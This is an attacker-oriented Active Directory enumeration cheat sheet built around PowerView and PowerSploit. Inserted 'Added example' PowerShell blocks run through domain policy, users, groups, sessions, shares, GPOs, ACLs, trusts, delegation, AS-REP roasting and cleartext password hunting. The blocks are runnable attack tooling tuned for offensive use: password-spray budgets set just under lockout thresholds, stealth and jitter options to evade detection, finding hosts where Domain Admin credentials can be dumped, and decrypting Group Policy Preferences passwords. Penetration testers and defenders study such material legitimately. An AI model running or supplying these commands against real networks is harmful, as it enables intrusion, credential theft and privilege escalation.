Enumeration

Tools

SharpView: https://github.com/tevora-threat/SharpView (aggressor https://github.com/tevora-threat/PowerView3-Aggressor)

PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 (tips https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) (dev: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)

ADModule: https://github.com/samratashok/ADModule (the ActiveDirectory module can be used without installing RSAT: Import-Module the Microsoft.ActiveDirectory.Management.dll shipped in the repo, then the ActiveDirectory.psd1 next to it)

Domain

Get Domain

Get-NetDomain
Get-NetDomain -Domain domain.local

Get Domain SID

Get-DomainSID 
Get-DomainSID -Domain domain.local

Get Domain Policy

Get-DomainPolicy
(Get-DomainPolicy)."system access"
(Get-DomainPolicy -Domain domain.local)."system access"

Get DCs
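Added example, not part of the original page: domain-level recon with PowerView (PowerSploit master branch cmdlet names), ending with the policy values that decide whether password spraying is safe. Assumes PowerView.ps1 is loaded in the session; domain.local is a placeholder.

```powershell
# Added example: PowerView domain recon. Assumes PowerView.ps1 is dot-sourced.
# Domain controllers of the current domain, or of another reachable domain.
Get-NetDomainController
Get-NetDomainController -Domain domain.local

# Domain SID: needed later for golden/silver tickets and SID-history abuse.
$domainSid = Get-DomainSID

# Password, lockout and Kerberos policy come from the default domain policy
# (GptTmpl.inf in SYSVOL); PowerView parses it into hashtables keyed by section.
$policy    = Get-DomainPolicy
$sysAccess = $policy.'system access'
$kerberos  = $policy.'kerberos policy'

# The .inf stores numbers as strings; cast before comparing.
[int]$lockoutThreshold = $sysAccess.LockoutBadCount      # 0 = no lockout
[int]$observationWin   = $sysAccess.ResetLockoutCount    # minutes
[int]$lockoutDuration  = $sysAccess.LockoutDuration      # minutes, -1 = until unlocked
[int]$minPwdLength     = $sysAccess.MinimumPasswordLength
[int]$complexity       = $sysAccess.PasswordComplexity   # 1 = complexity required

if ($lockoutThreshold -eq 0) {
    Write-Output "No account lockout: spraying is limited only by detection"
} else {
    Write-Output ("Lockout after {0} bad attempts, {1} min window, {2} min duration" -f
        $lockoutThreshold, $observationWin, $lockoutDuration)
    # Stay at least one attempt under the threshold per observation window.
    Write-Output ("Spray budget: {0} attempt(s) per account per {1} min" -f
        ($lockoutThreshold - 1), $observationWin)
}
Write-Output "Minimum length $minPwdLength, complexity=$complexity"

# Max TGT lifetime (hours) tells you how long a forged ticket should claim to be valid
# to blend in with legitimate ones.
Write-Output ("MaxTicketAge {0}h, MaxRenewAge {1}d" -f $kerberos.MaxTicketAge, $kerberos.MaxRenewAge)
```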

Users

Get a list of users in the current domain

Get a list of all properties for users within domain

Search for particular string in users attribute
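Added example, not part of the original page: the user-enumeration commands for this section, with PowerView (master branch names) and the attributes that pay off most. Assumes PowerView.ps1 is loaded; svc_backup and domain.local are placeholders.

```powershell
# Added example: PowerView user enumeration. Assumes PowerView.ps1 is dot-sourced.
# All users in the current domain; names only is quieter on screen than full objects.
Get-NetUser | Select-Object -ExpandProperty samaccountname

# One user's full LDAP object, or users of another domain.
Get-NetUser -UserName svc_backup
Get-NetUser -Domain domain.local

# All attributes of all users, then the ones worth reading:
#   pwdlastset  - passwords never rotated (service accounts, old admins)
#   lastlogon   - dormant accounts nobody watches
#   badpwdcount - who is already close to lockout before you spray
Get-UserProperty
Get-UserProperty -Properties pwdlastset, lastlogon, badpwdcount

# Substring search in an attribute. Description fields are a classic home for
# "temporary" passwords left by helpdesk staff.
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "built"

# Accounts with an SPN are Kerberoastable; adminCount=1 marks current or former
# members of protected groups (AdminSDHolder), interesting either way.
Get-NetUser -SPN | Select-Object samaccountname, serviceprincipalname
Get-NetUser -AdminCount | Select-Object samaccountname, pwdlastset

# Raw LDAP filter with the bitwise-AND matching rule: users whose password never
# expires (DONT_EXPIRE_PASSWORD = 0x10000 = 65536 in userAccountControl).
Get-NetUser -Filter '(userAccountControl:1.2.840.113556.1.4.803:=65536)' |
    Select-Object samaccountname, pwdlastset
```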

Groups

Get all groups in current domain

Get all groups containing admin in current domain

Get members of domain admin group

Get the group membership for a user
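Added example, not part of the original page: the group commands for this section with PowerView (master branch names). Assumes PowerView.ps1 is loaded; svc_backup and domain.local are placeholders.

```powershell
# Added example: PowerView group enumeration. Assumes PowerView.ps1 is dot-sourced.
# All groups (names), optionally in another domain; -FullData returns the LDAP object.
Get-NetGroup | Select-Object -ExpandProperty samaccountname
Get-NetGroup -Domain domain.local

# Wildcard on the name. "admin" catches Domain/Enterprise/Schema Admins but also
# the delegation groups (e.g. "SRV-Admins") that local-admin rights usually flow through.
Get-NetGroup -GroupName *admin*

# Members of Domain Admins. -Recurse expands nested groups, which is where
# "Helpdesk -> Server Ops -> Domain Admins" style membership hides.
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Domain Admins" -Recurse |
    Select-Object MemberName, IsGroup, MemberDomain

# Enterprise Admins exists only in the forest root, so name that domain explicitly.
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain domain.local

# Groups a user is a direct member of (memberOf). Effective membership through
# nesting is easier to see from the group side with -Recurse.
Get-NetGroup -UserName svc_backup

# Protected-group members that look like service accounts: usually a
# Kerberoastable, never-expiring password with DA rights behind it.
Get-NetGroupMember -GroupName "Domain Admins" -Recurse |
    Where-Object { -not $_.IsGroup -and ($_.MemberName -like 'svc*' -or $_.MemberName -like '*service*') } |
    Select-Object MemberName, MemberDomain
```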

Computers / Sessions

Get a list of computers in current domain

List all local groups on a machine (needs admin privileges to query non-DC machines)

List members of local groups on a machine (needs admin privileges on non-DC machines)

Get actively logged-on users on the target (needs admin rights on the target)

Get locally logged-on users on the target (needs the Remote Registry service running; started by default on servers, not on workstations)

Get the last logged-on user on the target (needs admin rights and Remote Registry running)
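Added example, not part of the original page: the computer and session commands for this section with PowerView (master branch names), plus a sweep that records who has a session where. Assumes PowerView.ps1 is loaded; host names are placeholders.

```powershell
# Added example: PowerView computer/session enumeration. Assumes PowerView.ps1 is dot-sourced.
# Computer accounts from LDAP: no contact with the hosts themselves.
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -FullData | Select-Object name, operatingsystem, lastlogontimestamp

# -Ping touches every host (ICMP). Filtering on lastlogontimestamp is the quiet
# way to drop stale machine accounts.
Get-NetComputer -Ping

# Local groups on a host. Works against a DC as a plain user; member servers and
# workstations generally require local admin on the target.
Get-NetLocalGroup -ComputerName dc01.domain.local -ListGroups
Get-NetLocalGroup -ComputerName srv01.domain.local              # Administrators by default
Get-NetLocalGroup -ComputerName srv01.domain.local -GroupName "Remote Desktop Users"

# Interactive logons (NetWkstaUserEnum) and SMB sessions (NetSessionEnum).
# Get-NetLoggedon needs admin on current Windows versions.
Get-NetLoggedon -ComputerName srv01.domain.local
Get-NetSession  -ComputerName srv01.domain.local

# Logged-on users via the HKU hive over Remote Registry: no admin needed as long
# as the service is running (servers by default, workstations usually not).
Get-LoggedOnLocal -ComputerName srv01.domain.local

# Last interactive logon from the LogonUI key; needs admin and Remote Registry.
Get-LastLoggedOn -ComputerName srv01.domain.local

# Sweep: for every host that answers, record the logged-on users so you can
# decide where to land. One connection per host, so this is not stealthy.
$results = foreach ($target in (Get-NetComputer -Ping)) {
    Get-NetLoggedon -ComputerName $target -ErrorAction SilentlyContinue |
        Select-Object @{n='ComputerName';e={$target}}, UserName, LogonDomain
}
$results | Where-Object { $_.UserName -and $_.UserName -notlike '*$' } |   # drop machine accounts
    Sort-Object ComputerName, UserName -Unique | Format-Table -AutoSize
```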

Files

Find shares on hosts in current domain

Find sensitive files on computers within domain

Get all file servers of domain
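Added example, not part of the original page: the share and file hunting commands for this section with PowerView (master branch names). Assumes PowerView.ps1 is loaded; domain.local and the output file name are placeholders.

```powershell
# Added example: PowerView share/file hunting. Assumes PowerView.ps1 is dot-sourced.
# Every host gets a NetShareEnum and every share a directory listing: noisy.

# Shares across the domain. Admin shares (C$, ADMIN$, IPC$, print$) are noise;
# -CheckShareAccess keeps only shares the current user can actually open.
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
Invoke-ShareFinder -CheckShareAccess

# File hunt with the built-in terms (password/sensitive/admin/login/secret,
# unattend*.xml, *.vmdk, *.config and similar); -Terms replaces them.
# -SearchSYSVol restricts the hunt to SYSVOL on the DCs (logon scripts, GPP xml).
Invoke-FileFinder -Verbose
Invoke-FileFinder -SearchSYSVol
Invoke-FileFinder -Terms *.kdbx, *.ppk, id_rsa, *.pfx, web.config -OutFile .\interesting.csv

# Hosts referenced as file servers in users' homeDirectory/scriptPath/profilePath:
# found from LDAP alone, no share scanning.
Get-NetFileServer
Get-NetFileServer -Domain domain.local

# Target only those servers instead of every computer in the domain.
$fileServers = Get-NetFileServer
Invoke-ShareFinder -ComputerName $fileServers -ExcludeStandard -ExcludeIPC -CheckShareAccess
Invoke-FileFinder  -ComputerName $fileServers -Terms *pass*, *cred*, *.kdbx -OutFile .\fs-hits.csv
```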

GPO / OU

Get list of GPO in current domain

Get GPO which use restricted groups or groups.xml for interesting users

Get users which are in a local group of a machine using GPO

Find machines where given user is a member of a specific group

Get OUs in a Domain

Get GPO applied on an OU
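Added example, not part of the original page: the GPO and OU commands for this section with PowerView (master branch names), including resolving the GPOs linked to an OU from its gPLink attribute. Assumes PowerView.ps1 is loaded; ws01, student1 and the OU name "Workstations" are placeholders.

```powershell
# Added example: PowerView GPO/OU enumeration. Assumes PowerView.ps1 is dot-sourced.
# All GPOs, and only those applied to a given computer (PowerView walks the host's
# OU chain and site and reads their gPLink attributes).
Get-NetGPO | Select-Object displayname, name, whenchanged
Get-NetGPO -ComputerName ws01.domain.local

# GPOs that set local group membership through Restricted Groups (GptTmpl.inf)
# or Group Policy Preferences (Groups.xml). This is how "helpdesk is local admin
# on every workstation" is normally implemented.
Get-NetGPOGroup

# Who ends up in a local group on this host via GPO.
Find-GPOComputerAdmin -ComputerName ws01.domain.local

# The reverse: hosts where this user/group is pushed into Administrators (default)
# or Remote Desktop Users.
Find-GPOLocation -UserName student1
Find-GPOLocation -UserName student1 -LocalGroup RDP

# OUs with their gPLink. Each link looks like
# [LDAP://cn={GUID},cn=policies,cn=system,DC=domain,DC=local;<flags>]
Get-NetOU -FullData | Select-Object name, gplink

# GPOs applied to one OU: pull the GUIDs out of gPLink and look each up by cn.
$ou = Get-NetOU -OUName "Workstations" -FullData
if ($ou.gplink) {
    $gpoGuids = [regex]::Matches($ou.gplink, '(?i)cn=(\{[0-9a-f-]+\})') |
        ForEach-Object { $_.Groups[1].Value }
    foreach ($guid in $gpoGuids) {
        Get-NetGPO -GPOname $guid | Select-Object displayname, gpcfilesyspath
    }
}

# Reverse lookup: every OU that links a given GPO.
Get-NetOU -GUID "{31B2F340-016D-11D2-945F-00C04FB984F9}"   # Default Domain Policy GUID
```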

ACLs

Get ACLs associated with a specific object

Search for interesting ACEs

Get the ACLs associated with the specified path
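Added example, not part of the original page: the ACL commands for this section with PowerView (master branch names), filtered down to the rights that give control of the target object. Assumes PowerView.ps1 is loaded; student1, helpdesk and dc01 are placeholders.

```powershell
# Added example: PowerView ACL enumeration. Assumes PowerView.ps1 is dot-sourced.
# DACL of a single object. -ResolveGUIDs maps extended-right and property GUIDs
# to names such as User-Force-Change-Password or DS-Replication-Get-Changes-All.
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
Get-ObjectAcl -ADSpath 'LDAP://CN=Domain Admins,CN=Users,DC=domain,DC=local' -ResolveGUIDs

# Only the ACEs a particular principal holds on an object.
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs |
    Where-Object { $_.IdentityReference -match 'helpdesk' }

# Built-in shortcuts for the two rights most often abused.
Get-ObjectAcl -SamAccountName student1 -RightsFilter ResetPassword
Get-ObjectAcl -SamAccountName "Domain Admins" -RightsFilter WriteMembers

# Domain-wide: every ACE held by a non-builtin principal (RID >= 1000).
# Reads every object's security descriptor, so expect it to take a while.
$aces = Invoke-ACLScanner -ResolveGUIDs

# Rights that translate directly into control of the object:
#   GenericAll / GenericWrite / WriteOwner / WriteDacl  - take over the object
#   WriteProperty on member (Self-Membership)            - add yourself to the group
#   User-Force-Change-Password                           - reset without the old password
#   DS-Replication-Get-Changes(-All)                     - DCSync
$aces | Where-Object {
    $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteOwner|WriteDacl' -or
    $_.ObjectType -match 'Self-Membership|User-Force-Change-Password|DS-Replication-Get-Changes'
} | Select-Object ObjectDN, IdentityReference, ActiveDirectoryRights, ObjectType |
    Sort-Object IdentityReference | Format-Table -AutoSize

# File-system ACL of a UNC path; PowerView maps the share to its local path on the server.
Get-PathAcl -Path '\\dc01.domain.local\sysvol'
```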

Trusts

Domain Trust Mapping

Forest Mapping

Get all domains in current forest

Get all global catalogues for the current forest

Map trusts of a forest
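Added example, not part of the original page: the trust-mapping commands for this section with PowerView (master branch names), ending with a forest-wide edge list. Assumes PowerView.ps1 is loaded; domain.local is a placeholder forest root and trusts.csv an arbitrary output name.

```powershell
# Added example: PowerView trust mapping. Assumes PowerView.ps1 is dot-sourced.
# Trusts of the current (or named) domain. Default uses the .NET trust API;
# -LDAP reads the trustedDomain objects instead, which works across segmentation
# that blocks direct domain connections. TrustDirection says which way
# authentication flows; TrustType distinguishes parent/child from external/forest.
Get-NetDomainTrust
Get-NetDomainTrust -Domain domain.local
Get-NetDomainTrust -Domain domain.local -LDAP

# Forest object and all domains in it.
Get-NetForest
Get-NetForest -Forest domain.local
Get-NetForestDomain
Get-NetForestDomain -Forest domain.local

# Global catalogs: a partial replica of every domain in the forest, so a single
# LDAP target (port 3268) answers forest-wide user/group lookups.
Get-NetForestCatalog

# Trusts the forest root has with other forests.
Get-NetForestTrust

# Forest-wide edge list: trusts of every domain in the forest, de-duplicated.
Get-NetForestDomain |
    ForEach-Object { Get-NetDomainTrust -Domain $_.Name } |
    Select-Object SourceName, TargetName, TrustType, TrustDirection |
    Sort-Object SourceName, TargetName -Unique |
    Format-Table -AutoSize

# Transitive map: follows every trust it discovers (including foreign forests)
# and records each domain once; export for graphing.
Invoke-MapDomainTrust | Export-Csv -NoTypeInformation .\trusts.csv
```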

Scripts

Find all machines in the current domain where the current user has local admin access (queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then runs multi-threaded Invoke-CheckLocalAdminAccess against each machine. This generates a logon event on every machine: loud!)

Find local admins on all machines of the domain (needs administrator privileges on non-DC machines; queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then runs multi-threaded Get-NetLocalGroup against each machine.)

Find computers where a domain admin (or specified user/group) has sessions (queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of computers (Get-NetComputer) and lists sessions and logged-on users (Get-NetSession/Get-NetLoggedon) on each machine.)

Confirm admin access

Find computers where a domain admin is logged in, stealthily (queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets only the high-traffic servers (DCs, file servers and distributed file servers) to generate less traffic, and lists sessions and logged-on users (Get-NetSession/Get-NetLoggedon) on each of them.)
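Added example, not part of the original page: the hunting functions described in this section with PowerView (master branch names), with a note on how loud each one is, and a cross-reference between where you are admin and where a Domain Admin has a session. Assumes PowerView.ps1 is loaded; RDPUsers and svc_sql are placeholders.

```powershell
# Added example: PowerView hunting functions. Assumes PowerView.ps1 is dot-sourced.
# Hosts where the current user is local admin. Each check opens the Service
# Control Manager on the target (OpenSCManager), so every host logs a logon: loud.
Find-LocalAdminAccess -Verbose

# Members of the local Administrators group on every host (NetLocalGroupGetMembers).
# Needs admin on non-DC hosts; silent failures usually mean "no rights there".
Invoke-EnumerateLocalAdmin -Verbose

# Hosts where Domain Admins (default) or a named group/user have sessions.
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -UserName svc_sql

# Same hunt plus an admin-access check on each host where a target was seen,
# so you can go straight to machines where you can dump that session's credentials.
Invoke-UserHunter -CheckAccess

# Stealth: only DCs, file servers and DFS servers are queried, since that is
# where privileged sessions usually are. Fewer hosts touched, far fewer events.
Invoke-UserHunter -Stealth

# Throttle: fixed delay in seconds between hosts, plus random jitter (fraction).
Invoke-UserHunter -Stealth -Delay 5 -Jitter 0.3

# Cross-reference without -CheckAccess: hosts where you are admin AND a DA is
# logged on. Find-LocalAdminAccess returns host names; UserHunter returns objects.
$adminHosts = Find-LocalAdminAccess
Invoke-UserHunter |
    Where-Object { $adminHosts -contains $_.ComputerName } |
    Select-Object UserDomain, UserName, ComputerName, SessionFrom |
    Sort-Object ComputerName -Unique
```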

PrivEsc

Unconstrained Delegation

Constrained Delegation
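Added example, not part of the original page: unconstrained and constrained delegation checks with PowerView (master branch names) and the equivalent raw LDAP filters, which also work with the ADModule. Assumes PowerView.ps1 or the ADModule is loaded.

```powershell
# Added example: delegation enumeration. Assumes PowerView.ps1 (and, for the
# last two lines, the ADModule) is loaded.

# Unconstrained delegation: TRUSTED_FOR_DELEGATION (0x80000 = 524288) in
# userAccountControl. DCs always have it; any other host with it caches the TGT
# of every user that authenticates to it, so compromising it harvests those TGTs.
$dcs = Get-NetDomainController | Select-Object -ExpandProperty Name
Get-NetComputer -Unconstrained | Where-Object { $dcs -notcontains $_ }   # non-DC hosts only
Get-NetComputer -Unconstrained -FullData | Select-Object dnshostname, useraccountcontrol
Get-NetUser -Unconstrained                                               # user accounts with the flag

# The same query as a raw filter (1.2.840.113556.1.4.803 is the bitwise-AND rule).
$uacTrustedForDelegation = 524288
Get-NetComputer -Filter "(userAccountControl:1.2.840.113556.1.4.803:=$uacTrustedForDelegation)"

# Constrained delegation: msDS-AllowedToDelegateTo lists the SPNs the account may
# delegate to. If TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000 = 16777216) is also
# set (protocol transition), the account can S4U2Self a ticket for any user
# without that user ever authenticating to it.
Get-NetUser -Filter '(msds-allowedtodelegateto=*)' |
    Select-Object samaccountname, 'msds-allowedtodelegateto', useraccountcontrol
Get-NetComputer -Filter '(msds-allowedtodelegateto=*)' -FullData |
    Select-Object dnshostname, 'msds-allowedtodelegateto'

$uacTrustedToAuth = 16777216
Get-NetUser -Filter "(&(msds-allowedtodelegateto=*)(userAccountControl:1.2.840.113556.1.4.803:=$uacTrustedToAuth))" |
    Select-Object samaccountname, 'msds-allowedtodelegateto'

# ADModule equivalents: Get-ADObject accepts the same LDAP filters.
Get-ADObject -LDAPFilter '(msds-allowedtodelegateto=*)' -Properties msDS-AllowedToDelegateTo, userAccountControl
Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation |
    Select-Object DNSHostName
```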

ASREP Roasting

Clear Passwords
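Added example, not part of the original page: finding AS-REP roasting candidates and hunting cleartext passwords with PowerView (master branch names) and the ADModule. Assumes one of them is loaded and, for Get-GPPPassword, PowerSploit's Exfiltration module. Which sources the "Clear Passwords" heading refers to is not stated on the page; the block covers the usual ones (description fields, userPassword/unixUserPassword attributes, and Group Policy Preferences cpassword values in SYSVOL) as an assumption.

```powershell
# Added example: AS-REP roasting candidates and cleartext password hunting.
# Assumes PowerView.ps1 and the ADModule are loaded; domain.local is a placeholder.

# AS-REP roasting: DONT_REQ_PREAUTH (0x400000 = 4194304). The KDC returns an
# AS-REP encrypted with the user's key to anyone who asks, so it can be cracked offline.
$uacNoPreauth = 4194304
Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=$uacNoPreauth)" |
    Select-Object samaccountname, pwdlastset, useraccountcontrol

# ADModule equivalent.
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth |
    Select-Object SamAccountName

# Cleartext in attributes. 'description' is the classic; userPassword and
# unixUserPassword are populated by some Unix-integration tooling and are readable
# by any authenticated user unless the default ACL was tightened.
Find-UserField -SearchField Description -SearchTerm 'pass'

# Octet-string attributes come back as byte arrays (or collections of them);
# decode so the values are readable.
function ConvertTo-AttributeText {
    param($Value)
    if ($null -eq $Value)      { return $null }
    if ($Value -is [byte[]])   { return [Text.Encoding]::UTF8.GetString($Value) }
    if ($Value -is [string])   { return $Value }
    if ($Value -is [System.Collections.IEnumerable]) {
        return (@($Value) | ForEach-Object { ConvertTo-AttributeText $_ }) -join '; '
    }
    return [string]$Value
}

Get-ADUser -LDAPFilter '(|(userPassword=*)(unixUserPassword=*))' -Properties userPassword, unixUserPassword |
    Select-Object SamAccountName,
        @{n='userPassword';     e={ ConvertTo-AttributeText $_.userPassword }},
        @{n='unixUserPassword'; e={ ConvertTo-AttributeText $_.unixUserPassword }}

# Group Policy Preferences: cpassword in Groups.xml/Services.xml/ScheduledTasks.xml
# etc. is AES-encrypted with a key Microsoft published (MS14-025). Get-GPPPassword
# decrypts every instance it finds in SYSVOL; patched DCs stop writing new ones,
# but old files are frequently still there.
Get-GPPPassword

# Manual check for anything Get-GPPPassword did not parse.
Get-ChildItem -Path "\\domain.local\SYSVOL" -Recurse -Include *.xml -ErrorAction SilentlyContinue |
    Select-String -Pattern 'cpassword=' -List |
    Select-Object Path
```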
